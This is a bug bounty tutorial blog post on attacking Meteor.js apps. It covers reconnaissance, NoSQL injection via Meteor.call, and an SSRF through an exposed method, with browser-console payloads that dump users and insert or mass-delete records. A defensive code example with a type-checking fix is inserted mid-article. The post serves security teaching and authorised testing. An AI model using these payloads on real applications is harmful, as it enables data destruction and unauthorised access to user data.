Javascript for bug bounty hunters — part 3

Ahmed Ezzat (BitTheByte)
3 min read · Sep 4, 2020


This is a follow up to https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7

Chapter 7: Attacking Meteor.JS

Chapter 7–1: Information gathering

MeteorJS is not only a frontend library; it also has its own backend engine that manages the communication between client and server. Running the following commands in Chrome's DevTools will help us extract some useful information about the server and the working environment

Chapter 7–2: NoSQL Injection at MeteorJS apps

At first look, this server-side code looks safe; however, it is vulnerable to NoSQL injection attacks (https://resources.infosecinstitute.com/what-is-nosql-injection/)

Unsafe MeteorJS code example

From the client side, this code could be invoked using the following JavaScript

This will result in removing the cart with ID=1 (server-side). Nothing fancy here. However, by default MeteorJS-based apps accept NoSQL queries as parameters, and from the server-side code above we saw that cartId is passed directly to .remove(), so sending (via the Chrome console) a NoSQL query as follows

will result in removing all carts with ID ≥ 0, effectively removing all of them. Rather than the manual method, we will use some tools to help us. A useful Chrome extension for gathering information and discovering insecure functions is Meteor DevTools: https://chrome.google.com/webstore/detail/meteor-devtools/ippapidnnboiophakmmhkdlchoccbgje?hl=en.

Here is a list of JavaScript snippets to test against Meteor.js applications

Meteor.users.find().fetch(); // Sometimes returns all users
Meteor.call("CustomName", {$gte: 0}); // NoSQLI case
_.each(Router.routes, route => console.log(route.getName(), route.path())); // List routes, e.g. https://example.com/[Router]
CollectionName.insert({ key: value }); // NoSQLI insert
CollectionName.remove({ _id: {$regex: ".*?"} }); // NoSQLI remove
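To make the cart-removal case above concrete from the defender's side, here is an added example (not code from the article or from Meteor): a minimal in-memory stand-in for a Meteor collection, the removeCart method in the unsafe form the article describes, and a hardened form that validates the argument first. matchField/makeCollection approximate MongoDB selector semantics, and checkNumber stands in for `check(cartId, Number)` from Meteor's `check` package; all are assumptions of this example.

```javascript
// Added example: stand-in for a Meteor collection and the removeCart method.
// A scalar selector value means exact match; an object is an operator expression.
function matchField(value, cond) {
  if (cond === null || typeof cond !== 'object') return value === cond;
  return Object.entries(cond).every(([op, arg]) => {
    if (op === '$gte') return value >= arg;
    if (op === '$regex') return new RegExp(arg).test(String(value));
    throw new Error('unsupported operator ' + op);
  });
}

function makeCollection(docs) {
  const store = docs.map(d => ({ ...d }));
  return {
    // Like Collection.remove(selector); returns the number of removed docs.
    remove(selector) {
      const kept = store.filter(doc =>
        !Object.entries(selector).every(([k, c]) => matchField(doc[k], c)));
      const removed = store.length - kept.length;
      store.splice(0, store.length, ...kept);
      return removed;
    },
    count() { return store.length; },
  };
}

// Stand-in for check(value, Number): operator objects such as {$gte: 0} are rejected.
function checkNumber(value) {
  if (typeof value !== 'number') throw new Error('Match error: expected Number');
}

// Unsafe: the client-supplied argument becomes part of the selector unchecked.
function removeCartUnsafe(carts, cartId) {
  return carts.remove({ _id: cartId });
}

// Hardened: validate the argument type before it touches the query.
function removeCartSafe(carts, cartId) {
  checkNumber(cartId);
  return carts.remove({ _id: cartId });
}

// Constructed sample data with numeric ids, matching the article's cart ID=1.
const SAMPLE_CARTS = [{ _id: 0 }, { _id: 1 }, { _id: 2 }];

function demo() {
  const unsafe = makeCollection(SAMPLE_CARTS);
  const byId = removeCartUnsafe(unsafe, 1);                 // removes only cart 1
  const byOperator = removeCartUnsafe(unsafe, { $gte: 0 }); // removes the other two
  const safe = makeCollection(SAMPLE_CARTS);
  let rejected = false;
  try { removeCartSafe(safe, { $gte: 0 }); } catch (e) { rejected = true; }
  return { byId, byOperator, rejected, safeLeft: safe.count() };
}
```

In a real Meteor method the same effect comes from calling `check(cartId, Number)` (or `String` for string ids) at the top of the method body, before any collection call.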

Useful resources

Chapter 8: Real-life applications (2)

Chapter 8–1: Authentication Bypass

I'm not allowed to disclose this yet, but here is a screenshot from the pending disclosure request

By just running this code in my Chrome browser I was able to access random users' profiles

Chapter 8–2: Server-side Request Forgery

This one also can't be disclosed yet (Bugcrowd's policies, y'all). An SSRF was found in an exported method named readResumeFromS3. It was intended to be internal; however, after some digging through the client-side code I was able to find it. Invoking it returned a big chunk of data from the internal S3 bucket

> Meteor.call("readResumeFromS3", '', function(e, a) { console.log(e, a) })
<- undefined {contentType: "application/xml", fileData: "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz…DbGFzcz48L0NvbnRlbnRzPjwvTGlzdEJ1Y2tldFJlc3VsdD4="}

The next article will discuss my general approach when testing a javascript framework and also will include some write-ups :)
